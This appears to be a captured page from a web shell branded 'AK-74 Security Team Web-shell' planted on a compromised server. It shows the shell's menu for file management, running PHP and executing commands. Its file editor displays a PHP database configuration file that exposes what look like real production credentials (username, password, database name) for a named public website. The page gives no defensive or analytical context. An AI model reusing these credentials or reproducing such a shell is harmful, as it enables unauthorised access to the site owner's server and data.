.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php session_start(); error_reporting(0); /*************** set time zone ***************/ date_default_timezone_set('Asia/Calcutta'); if($_SERVER['SERVER_NAME']=="localhost") { define('DB_SERVER', 'localhost'); define('DB_USERNAME', 'root'); define('DB_PASSWORD', ''); define('DB_DATABASE', 'hm_shanidham'); define('SITEURL', 'http://localhost/hidemedia/shanidham'); } else{ define('DB_SERVER', 'localhost'); define('DB_USERNAME', 'e4uhui08_shanidham_org'); define('DB_PASSWORD', 'shani@2023#org'); define('DB_DATABASE', 'e4uhui08_shanidham_org'); define('SITEURL', 'https://www.shanidham.org'); } $db=mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_DATABASE) or die('try again in some minutes, please'); ?>
Rename:
-